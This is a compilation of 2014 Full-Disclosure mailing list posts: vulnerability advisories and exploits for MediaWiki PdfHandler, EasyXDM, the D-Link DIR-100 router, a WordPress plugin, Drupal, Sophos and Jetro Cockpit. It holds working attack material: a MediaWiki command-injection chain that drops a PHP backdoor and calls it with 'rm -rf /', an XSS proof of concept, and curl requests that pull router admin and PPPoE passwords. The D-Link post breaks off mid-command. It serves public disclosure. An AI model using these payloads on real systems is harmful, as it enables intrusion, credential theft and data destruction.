[Full-disclosure] Jetro Cockpit Secure Browsing vulnerability - remote code execution on all enterprise workstations simultaneously
A critical vulnerability was discovered in Jetro Cockpit Secure Browsing, a popular enterprise secure browsing solution. The vulnerability allows simultaneous remote code execution into all the enterprise workstations using the product. The vulnerability is unique in that it breaks the basic value proposition of the security product in which it is found. Full disclosure and details here: http://blog.quaji.com/2014/02/remote-code-execution-on-all-enterprise.html Ronen Zilberman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 2851-1] drupal6 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2851-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso February 02, 2014 http://www.debian.org/security/faq - - Package: drupal6 Vulnerability : impersonation Problem type : remote Debian-specific: no CVE ID : CVE-2014-1475 Christian Mainka and Vladislav Mladenov reported a vulnerability in the OpenID module of Drupal, a fully-featured content management framework. A malicious user could exploit this flaw to log in as other users on the site, including administrators, and hijack their accounts. These fixes require extra updates to the database which can be done from the administration pages. For the oldstable distribution (squeeze), this problem has been fixed in version 6.30-1. We recommend that you upgrade your drupal6 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJS7qNRAAoJEAVMuPMTQ89EYqoP+wUL/5MNsjxndj/ospigHtTS GzPc9HGxU7FYHKn2b8+rkdpXrbHer1CV+tO8aNj74oEf7ogfpq+VnPxzfyUkTt+U q11pYx5R+mAfTbRktMcQJDCxKvwfd/nwWSCnlDNHaA8YlvPmLIPHXlUR5NEVJLAy aixManZInNlkwNxLmBoC4vuy8boa5lD3iV6YzQk61utJsgshLytVZIxAnA1hz+kl GEwubJHjop0j4Aqc8hZYvHWjJYHoNANYGAT8TRZ2fhgjkNEqKbooU6BME1MxxgeI 9hnB7xj37tR2T+p6KVaNIg3zeM1LVrbqKFALszkxqZFgpIIaesPGCLAfn0UCCqL1 vMHW0G4mzytL0F8hG11XbW3rJCkddleIy+2nKur5YA5dkYINve9GhX8MWG40wxXc RQmou8HbFQcQZ8X9aNmWb1VMBnJkmw5M4ldp/J3vceRvPbpTer5a0U/0637AmGgD ipe9Zv2JahhEZmbT+stdC+3YH5VXeUB6BQf0/xhbb01XYFT7c8FAe3z0vwKaq+6Q S6OzU9TzscX6NVIYx+KYSDinlsocv5yatDBttucBRr/NBvUhLQYmTQr5g2STZmEZ Hlyob+PKW49Fax8qVmlilSkQ9A9+D7C7eskl6nmS/CFzfLaHsj+EDGEU6sSp67Jf R/h1N5OfP462uBf1vXMG =D+VD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Revision 1 (PoC added): MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 # # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) # Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014) # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) # Affected website : Wikipedia.org and more ! # # Exploit author : Xelenonz & @u0x (Pichaya Morimoto) # Release dates : Feb 1, 2014 # Special Thanks to 2600 Thailand ! # # Exploit: 1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "images/xnz.php` 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! # Related files: thumb.php <-- extract all _GET array to params /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options /includes/media/ImageHandler.php /includes/GlobalFunctions.php /includes/filerepo/file/File.php # Vulnerability Analysis: 1. thumb.php This script used to resize images if it is configured to be done when the web browser requests the image transform( $params, File::RENDER_NOW ); // << resize image by width/height ... // Stream the file if there were no errors $thumb->streamFile( $headers ); ... ?> 2. /includes/filerepo/file/File.php getHandler(); // << PDF Handler ... $normalisedParams = $params; $handler->normaliseParams( $this, $normalisedParams ); ... $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); .. ?> 3. /extensions/PdfHandler/PdfHandler_body.php &1"; ... $err = wfShellExec( $cmd, $retval ); ... ?> 4. /includes/GlobalFunctions.php Execute a shell command, with time and memory limits Error generating thumbnail Error generating thumbnail เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380. GPL Ghostscript 9.10: Unrecoverable error, exit code 1 GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1 uid=33(www-data) gid=33(www-data) groups=33(www-data) # Back-end $cmd GlobalFunctions.php : wfShellExec() cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' | '/usr/bin/convert' -depth 8 -resize 10|`echo "images/longcat.php` - '/tmp/transform_0e377aad0e27-1.jpg') 2>&1 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.14 (GNU/Linux) iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1 mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2 uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR 2LmeyQR2rzjBB7Sovvcn =ooEs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 # # MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) # Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014) # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) # Affected website : Wikipedia.org and more ! # # Exploit author : Xelenonz & @u0x (Pichaya Morimoto) # Release dates : Feb 1, 2014 # Special Thanks to 2600 Thailand ! # # Exploit: 1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "images/xnz.php` 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! # Related files: thumb.php <-- extract all _GET array to params /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options /includes/media/ImageHandler.php /includes/GlobalFunctions.php includes/filerepo/file/File.php # Vulnerability Analysis: 1. thumb.php This script used to resize images if it is configured to be done when the web browser requests the image transform( $params, File::RENDER_NOW ); // << resize image by width/height ... // Stream the file if there were no errors $thumb->streamFile( $headers ); ... ?> 2. /includes/filerepo/file/File.php getHandler(); // << PDF Handler ... $normalisedParams = $params; $handler->normaliseParams( $this, $normalisedParams ); ... $thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params ); .. ?> 3. /extensions/PdfHandler/PdfHandler_body.php &1"; ... $err = wfShellExec( $cmd, $retval ); ... ?> 4. /includes/GlobalFunctions.php Execute a shell command, with time and memory limits ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2014-1403] DOM XSS in EasyXDM 2.4.18
Affected products = easyXDM library < 2.4.19 - http://easyxdm.net/wp/ easyXDM is a Javascript library that enables you as a developer to easily work around the limitation set in place by the Same Origin Policy, in turn making it easy to communicate and expose javascript API's across domain boundaries. Vulnerabilities are fixed in version 2.4.19. All users are advised to upgrade. CVE === CVE-2014-1403 DOM XSS in name.html location.hash value Description --- EasyXDM uses name.html file to bootstrap cross origin communication between documents. It accepts various parameters in location.hash value, one of which is the URL of the document to load. Value of this parameter is not filtered, allowing to pass javascript: URL that may execute arbitrary Javascript code in context of the domain hosting EasyXDM installation. This vulnerability is described in greater details in [1] Analysis The root cause of the vulnerability is the following code in name.html file: if (location.hash) { // DOM XSS source if (location.hash.substring(1, 2) === "_") { var channel, url, hash = location.href.substring(location.href.indexOf("#") + 3), indexOf = hash.indexOf(","); if (indexOf == -1) { channel = hash; } else { channel = hash.substring(0, indexOf); url = decodeURIComponent(hash.substring(indexOf + 1)); } switch (location.hash.substring(2, 3)) { /... case "3": // NameTransport remote var guest = window.parent.frames[ "easyXDM_" + channel + "_provider" ]; if (!guest) { throw new Error("unable to reference window"); } guest.easyXDM.Fn.get(channel)(window.name); location.href = url + "#_4" + channel + ","; // DOM XSS sink break; Part of location hash, under certain conditions, ends up in location.href assignment, triggering JS execution. Proof of Concept http://domain/example/bridge.html"; onload="document.getElementById('f' ).src= 'http://domain/name.html#_3constructor,javascript:alert(document.domain)//' ;"> Credits === Vulnerability found by Krzysztof Kotowicz http://blog.kotowicz.net Timeline - 2013-01-xx - Discovery - 2013-01-10 - Notified project maintainer - 2013-01-19 - Fixed version release - 2013-01-31 - Public disclosure Related links = [1] http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Router D-Link DIR-100 Multiple Vulnerabilities
tl;dr: You could simply `ask` the D-Link DIR-100-D1 for the administrator password. Report is also available at: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt Enjoy * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: r...@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery:CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure:CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8 # Table of Contents 1. Background 2. Vulnerability Description 3. Technical Description 4. Severity and Remediation 5. Timeline # 1. Background The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications. # 2 Vulnerability Description Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker: - Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255] - Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200] - Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287] - Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352] - Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79] CVE-Numbers for these vulnerabilities has not yet been assigned. # 3 Technical Description of the Vulnerabilities ## 3.0 The DIR-100 Web Interface and CGI The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. list of features provided by each cgi-script can be retrieved by: curl 'http://192.168.1.104/cliget.cgi?cmd=help' # and respectively when authenticated curl 'http://192.168.1.104/cli.cgi?cmd=help' ## 3.1 Authentication Bypass ### Description The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated. ### Proof of Concept The web interface provides two distinct ways to retrieve the adminstrator password: curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1' curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary' ## 3.2 Weak Authentication ### Description As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used by without authenticating before as the cgi-script does not check any other authentication parameters such as cookies or HTTP Parameters. The only access check is if the IP-Address is the same. ### Proof of Concept # open the router interface in a web browser and log in firefox 'http://192.168.0.1/' # open a new terminal or another web-browser which is currently not logged # in and try to access curl 'http://192.168.0.1/cli.cgi?cmd=help' # this request will be authenticated and it will not be redirected to the # login page. If no user is logged in, the request will be redirected to # the login ## 3.3 Retrieve sensitive information ### Description Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred. ### Proof of Concept curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass' curl 'http://192.168.0.1/cli
[Full-disclosure] Bypass the Stop User Enumeration WordPress Plugin
Stop User Enumeration is a WordPress plugin that provides protection against an unauthenticated attacker gaining a list of all WordPress users. This information can aid an attacker in further attacks against the website including brute-force password guessing attacks. This can be performed using wp-scan. Homepage: http://wordpress.org/plugins/stop-user-enumeration/ Version: 1.2.4 (latest) According to the full disclosure methodology I have publicly disclosed this at the same time as notifying the vendor. Advisory - An attacker can bypass the username enumeration protection by using POST requests. The protection currently only stops GET requests to enumerate users. By sending POST requests with the body of "author=1" and incrementing the number over successive requests, the entire set of WordPress users can be enumerated. The WordPress user information is disclosed in the HTML response body, unlike being disclosed in the redirect header, as with GET requests. 1. POST / HTTP/1.1 Host: www.wordpress.com Content-Type: application/x-www-form-urlencoded Content-Length: 8 author=1 Andrew Horton (urbanadventurer) www.morningstarsecurity.com Visit my meta-aggregator of security news at http://www.morningstarsecurity.com/news/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2014-1610 description incorrect
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610 It states that authentication is required to exploit this and this is not true. What does require authentication usually is uploading the file. If there is already a djvu file that has been uploaded by another user, you do not need authentication to exploit this. https://gist.github.com/brandonprry/8746891 I believe this should be revised as the exploit itself does not require authentication. I think that will also result in a score change as well. -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2014-1213 - Denial of Service in Sophos Anti Virus
Vulnerability title: Denial of Service in Sophos Anti Virus CVE: CVE-2014-1213 Vendor: Sophos Product: Anti Virus Version: 10.0.11/Engine 3.48.x Reported by: Graham Sutherland Details: The following system objects do not have access control lists (ACLs) set, thus allowing any user to access and manipulate them: Global objects (in namespace \Global, a.k.a. \BaseNamedObjects): $$!_EVENT_$!__ $$!_EVENT_$!__DataUpdateRequest $$!_EVENT_$!__MmfMutexSAV- $$!_EVENT_$!__MmfMutexSAV-Info $$!_EVENT_$!__ReadyForUpdateSAV- $$!_EVENT_$!__ReadyForUpdateSAV-Info $$!_EVENT_$!__SAV- $$!_EVENT_$!__SAV-Info $$!_EVENT_$!__StateChange $$!_EVENT_$!__SuspendedSAV- $$!_EVENT_$!__SuspendedSAV-Info $$!_EVENT_$!__UpdateComplete $$!_EVENT_$!__UpdateMutex $$!_EVENT_$!__UpdateRequest $$!_MMMF_$!__ SAV- SAV-Info Session objects (in namespace \Sessions\n\BaseNamedObjects): SophosALMonSessionInstance Further details at: http://www.portcullis-security.com/security-research-and-downloads/secur ity-advisories/cve-2014-1213/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. ### This email originates from the systems of Portcullis Computer Security Limited, a Private limited company, registered in England in accordance with the Companies Act under number 02763799. The registered office address of Portcullis Computer Security Limited is: The Grange Barn, Pikes End, Pinner, MIDDX, United Kingdom, HA5 2EX. The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Any opinions expressed are those of the individual and do not represent the opinion of the organisation. Access to this email by persons other than the intended recipient is strictly prohibited. If you are not the intended recipient, any disclosure, copying, distribution or other action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email is subject to the terms and conditions expressed in the applicable Portcullis Computer Security Limited terms of business. ### # This e-mail message has been scanned for Viruses and Content and cleared by MailMarshal. # ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/